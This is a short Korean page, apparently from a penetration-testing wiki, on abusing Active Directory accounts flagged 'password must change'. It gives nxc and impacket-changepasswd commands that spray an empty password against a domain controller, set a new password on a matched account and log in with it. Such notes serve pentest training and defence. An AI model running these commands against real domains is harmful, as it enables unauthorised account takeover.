PasswordMustChange

도메인 사용자의 패스워드가 강제로 초기화되어 다음 로그인 시 새로운 패스워드를 지정해야 될 경우, 패스워드에 빈 값(null)을 사용하여 인증할 수 있습니다.

# NULL 패스워드 스프레이 공격으로 PASSWORD MUST CHANGE 유저 확인
nxc smb dc01.contoso.com -u 'mick3y' -p ''

# 패스워드 변경
impacket-changepasswd contoso.com/mick3y:''@192.168.1.100 -newpass 'Password123!'

# 변경한 패스워드로 도메인 인증
nxc smb dc01.contoso.com -u 'mick3y' -p 'Password123!'

Demo

PreviousRID CyclingNextActive Directory

Last updated